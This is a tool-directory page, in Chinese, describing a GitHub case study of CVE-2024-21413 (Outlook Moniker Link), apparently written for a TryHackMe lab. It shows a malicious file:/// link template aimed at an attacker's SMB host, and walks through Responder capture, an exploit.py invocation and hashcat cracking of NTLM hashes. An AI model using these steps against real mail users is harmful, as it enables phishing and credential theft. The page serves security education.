Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Estudo-de-Caso-CVE-2024-21413 — CVE-2024-21413 的案例研究。以 TryHackMe 的 Moniker Link(CVE-2024-21413)房间作为参数。使用 claude code 对 exploit 进行了编辑。 | Kitploit
工具/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
密码破解漏洞分析漏洞利用横向移动钓鱼攻击CTF学习与教育电子邮件安全实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
pedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

CVE-2024-21413 的案例研究。以 TryHackMe 的 Moniker Link(CVE-2024-21413)房间作为参数。使用 claude code 对 exploit 进行了编辑。

查看仓库
4个月前尚未审核

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + NTLM 凭据泄露

⚠️ 免责声明: 本仓库仅供安全教育和研究之用。所有演示均在受控且隔离的环境中进行。未经明确授权对系统使用这些技术是非法且不道德的。


📋 目录

  • 概述
  • 漏洞原理
  • 实验环境
  • 分步演示
  • Exploit 脚本
  • 攻击示意图
  • 缓解与防御
  • CVE 深度解析
  • 参考链接

🔍 概述

字段详情
CVECVE-2024-21413
披露日期2024 年 2 月 13 日(Patch Tuesday)
CVSS 评分9.8(严重)
受影响产品Microsoft Outlook
漏洞类型RCE + 凭据泄露(NTLM Hash)
攻击向量网络 / 电子邮件(无需预先认证)
用户交互需要用户交互(点击链接)
别名Moniker Link

CVE-2024-21413 是 Microsoft Outlook 中的一个严重漏洞,使攻击者能够:

  1. 通过强制自动 SMB 认证泄露受害者的 NTLM 凭据
  2. 通过电子邮件中的恶意链接在目标机器上远程执行代码

“Moniker Link” 这一名称源于对 Component Object Model (COM) Monikers(Windows 中通过字符串引用对象的机制)的利用,以绕过 Outlook 对 file:// 链接的保护。


🧠 漏洞原理

问题所在:绕过受保护视图(Protected View)

通常,Outlook 会阻止指向网络资源的 file:// 链接,并显示安全警告(受保护视图)。该缺陷在于 Outlook 处理包含 ! 字符(Moniker 分隔符)的 URL 的方式。

利用方式

恶意链接格式如下:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

! 字符会使 Outlook 的解析器将 URL 解释为对 COM Moniker 的引用,从而绕过常规安全检查。结果如下:

  • 受害者的机器会尝试通过 SMB 自动向攻击者的服务器进行认证
  • 在此认证过程中,受害者的 NTLM Hash 会被传输
  • 该 Hash 可用于 Pass-the-Hash 攻击或离线破解

简化攻击流程

root@kitploit:~
攻击者发送邮件 → 受害者点击链接 → Outlook 处理包含 "!" 的 URL
→ 绕过受保护视图 → 自动 SMB 连接 → 捕获 NTLM Hash

🖥️ 实验环境

为安全地复现此案例研究:

机器操作系统角色
攻击机Kali LinuxSMB 监听 + Exploit
目标机装有易受攻击 Outlook 的 Windows 10/11受害者

重要提示: 请使用隔离网络(VirtualBox/VMware 中的 NAT 或 Host-Only 模式)。切勿在真实网络上执行。

所需工具

root@kitploit:~
# Responder —— 用于捕获 Hash 的 SMB/HTTP 监听器
sudo apt install responder

# Python 3 —— 用于运行 exploit
python3 --version

# 检查机器之间的连通性
ping <IP_ALVO>

🚀 分步演示

步骤 1 — 获取攻击机 IP

root@kitploit:~
ip a | grep inet
# 记下与目标通信的接口 IP(例如:192.168.56.10)

步骤 2 — 启动 Responder

Responder 会创建一个伪造的 SMB 服务器,用于捕获 NTLM 认证 Hash。

root@kitploit:~
sudo responder -I eth0 -v
# 将 eth0 替换为你的网络接口

预期输出:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-ALVO:...

步骤 3 — 运行 Exploit

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_EMAIL> \
  --attacker-ip 192.168.56.10

步骤 4 — 等待受害者点击链接

当受害者打开邮件并点击链接时,Responder 会自动捕获 NTLM Hash。该 Hash 可用于:

  • 分析以识别被入侵的账户
  • 用于 Pass-the-Hash 在网络上进行横向认证
  • 交给 Hashcat/John 进行离线破解尝试:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Exploit 脚本

查看 exploit.py 文件获取完整且带注释的脚本。


📊 攻击示意图

查看 diagrama-ataque.html 文件,获取整个攻击流程的交互式可视化。


🛡️ 缓解与防御

查看 MITIGACAO.md 文件,获取完整的缓解与防御指南。


📄 CVE 深度解析

查看 CVE-BREAKDOWN.md 文件,获取该漏洞的详细技术分析。


📚 参考链接

  • 微软安全公告 — CVE-2024-21413
  • Morphisec — Moniker Link 研究报告
  • TryHackMe — Moniker Link 房间
  • Responder 工具 — GitHub
  • NTLM 认证 — Microsoft Docs
  • NVD — CVE-2024-21413

👤 作者

本案例研究是 TryHackMe 实战攻防安全培训的一部分。

本项目遵循**负责任披露(responsible disclosure)与道德黑客(ethical hacking)**原则。此处所有内容旨在促进教育并提升安全防护水平。

下载工具